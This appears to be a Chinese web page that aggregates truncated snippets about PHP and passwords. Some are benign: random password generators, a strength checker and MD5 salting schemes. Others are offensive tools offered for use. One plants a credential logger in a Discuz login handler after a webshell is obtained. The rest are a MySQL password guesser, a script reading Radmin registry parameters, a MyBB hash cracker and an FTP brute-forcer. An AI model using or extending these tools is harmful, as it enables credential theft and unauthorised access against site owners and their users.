拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 ...
使用PHP开发应用程序,尤其是网站程序,常常需要生成随机密码,如用户注册生成随机密码,用户重置密码也需要生成一个随机的密码。随机密码也就是一串固定长度的字符串,这里我收集整理了几种生成随机字符串的方法,以供大家参考。方法一:1、在 33 – 126 中生成一个随机整数,如 35,2、将 35 转换成对应的ASCII码字符,如 35 对应 #3、重复以上 1、2 步骤 n 次,连接成 n 位的密码该算法主要用到了两个函数,mt_rand ( int $min ...
//php生成新密码函数function genPassword($min = 5, $max = 8) { $validchars="abcdefghijklmnopqrstuvwxyz123456789"; $max_char=strlen($validchars)-1; $length=mt_rand($min,$max); $password = ""; for($i=0;$i{ $password.=$validchars[mt_rand(0,$max_char)]; } return $password; } echo "新密码:".genPassword().""; echo "新密码:".genPassword(5,10).""; ?>http://...
因为本人对sql注入比较喜欢 前前后后 检测过不少网站 ASPPHPJSP 发现基本都是用MD5加密算法 都说 MD5 不可逆 无法破 对 MD5是无法逆 可是可以暴力破 只需要把常用的密码 MD5后 放数据库里 别人只需要提供MD5密码 进行数据库对比 就可以还原密码了 国内www.cmd5.com国外www.xmd5.org 都提供在线爆破 很多站长被人入侵过吧?其中最大部分是管理员密码被SQL注入 导致泄露 然后进后台搞破坏 我发现 PHP的内置函数crypt 很不错 配合MD5...
因为本人对sql注入比较喜欢前前后后 检测过不少网站 ASPPHPJSP发现基本都是用MD5加密算法都说 MD5 不可逆 无法破对 MD5是无法逆 可是可以暴力破只需要把常用的密码 MD5后 放数据库里别人只需要提供MD5密码 进行数据库对比 就可以还原密码了国内www.cmd5.com国外www.xmd5.org都提供在线爆破很多站长被人入侵过吧?其中最大部分是管理员密码被SQL注入 导致泄露然后进后台搞破坏我发现 PHP的内置函数crypt 很不错配合MD5 更天下无敌$...
From:angels Blog Source URL:http://www.sablog.net/blog/archives/479/ 刚才上网瞎逛,无意中在小A(angel)的博客上看见的这段程序,写的很简单很强大!呵呵!~是用PHP实现的,我在他写的基础上给加了代码注释,方便不懂PHP的朋友理解,废话不多说,上代码! //在已知指定数据库服务器开了3306端口的情况下执行如下PHP脚本进行猜解。 Code-1:$hostdb = array(192.168.168.10,192.168.168.20,192.168.168.20,192.168.16...
孤水绕城’s Blog 应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。 $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");$rootkey = "HKEY_LOCAL_MACHINE\SYSTEMRAdmin\v2.0\Server\Parameters\";$Parameter = "Parameter";$Port = "Port";$logpath = "LogFilePath";$myparam = $shell->RegRead($rootkey.$Parameter);$myport = $shell->RegRead($rootkey.$Port);$path = $shell->Reg...
前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~一直没有进展~今天编写了一个小的利用程序~希望大家能用得上~pass.txt为密码字典~~一行一个~ 另外,虽然程序中用了很垃圾的英文字符,但是程序绝对原创~ [Copy to clipboard] [ - ]CODE:/*MyBB论坛程序密码暴力破解工具PHP版 By Cool_wXd[C.R.S.T]本程序主要是针对MyBB论坛程序密码加密形式md5(md5(salt).md5(password...
//用法:php 本文件.php FTP的IP 端口 用户字典 密码字典,示例:php ftp.php 192.168.8.10 21 user.dic pass.dic。可以自己改动sleep里的秒数,暴破成功后用户名和密码保存在同目录下的ok.txt。 //分别取不同用户名和N个密码对应$user=file($_SERVER["argv"][3]);$pass=file($_SERVER["argv"][4]);$countuser=count($user);$countpass=count($pass);$n=0;do { for($i=0;$i<$countpass;$i=$i+1){echo "$user[$n],$pass[$i]";ftplog...
MD5是在Web应用程序中最常用的密码加密算法。由于MD5是不可逆的,因而经过MD5计算得到后的密文,不能通过逆向算法得到原文。 回顾在Web应用程序中使用MD5加密文本密码的初衷,就是为了防止数据库中保存的密码不幸泄露后被直接获得。但攻击者不但拥有数据量巨大的密码字典,而且建立了很多MD5原文/密文对照数据库,能快速地找到常用密码的MD5密文,是破译MD5密文的高效途径。然而,MD5密文数据库所使用的是最常规的MD5加密算法:...
一、php页面 $score = 0; if(!empty($_GET[value])){ //接收的值 $str = $_GET[value]; }else{ $str = ; } if(preg_match("/[0-9]+/",$str)) { $score ++; } if(preg_match("/[0-9]{3,}/",$str)) { $score ++; } if(preg_match("/[a-z]+/",$str)) { $score ++; } if(preg_match("/[a-z]{3,}/",$str)) { $score ++; } if(preg_match("/[A-Z]+/",$str)) { $score ++; } if(preg_match("/[A-Z]{3,}/",$str)) { $score ++; } if(preg...
生成一个随机密码的函数,生成的密码为小写字母与数字的随机字符串,长度可自定义。/** php自动生成新密码自定义函数(带实例演示)适用环境: PHP5.2.x / mysql 5.0.x代码作者: xujiajay www.jbxue.com联系方式: xujiaphp@gmail.com * */ function genPassword($min = 5, $max = 8) { $validchars="abcdefghijklmnopqrstuvwxyz123456789"; $max_char=strlen($validchars)-1; $length=mt_rand($min,$max); $password = ""...
当你想生成一个随机的密码的时候,你第一想到的可能是使用 uniquid() 函数,但是如果我们使用 array_rand() 和 range() ,可以更完美的实现这个功能。 方法一,代码如下header("Content-type: text/html; charset=utf-8"); function randCode($length) {$ranges = array(range('a', 'z'), range('A', 'Z'), range(1, 9));$code = '';for($i = 0; $i $rkey = array_rand($ranges);$vkey = array_rand($ranges[$rkey]);$code .= $ran...
随机密码很简单,但是有很多可循地方,都是由一些特殊的字符串组成,下面我们来看看下面三种方法哦。方法一: 1、在 33 – 126 中生成一个随机整数,如 35, 2、将 35 转换成对应的ASCII码字符,如 35 对应 # 3、重复以上 1、2 步骤 n 次,连接成 n 位的密码 该算法主要用到了两个函数,mt_rand ( int $min , int $max )函数用于生成随机整数,其中 $min – $max 为 ASCII 码的范围,这里取 33 -126 ,可以根据需要调整范围,如ASC...
以下 $username, $password 分别指用户名和密码,$sitekey 为站点扰码。 密码设置提交的时候,使用 javascript 处理t_code0.value = md5 (username.value "|" passwd.value); passwd.value = ''; 假如提交的 passwd 有值或 t_code0 为空,设置密码失败; t_code0 的值保存到数据库的 save_pwd 字段中;密码校验 1. 用户端申请登录服务器生成随机码 $sid,保存到 $_SESSION[sid] 中,同时传递给用户; 表单2. 用户输入用户名和密码,...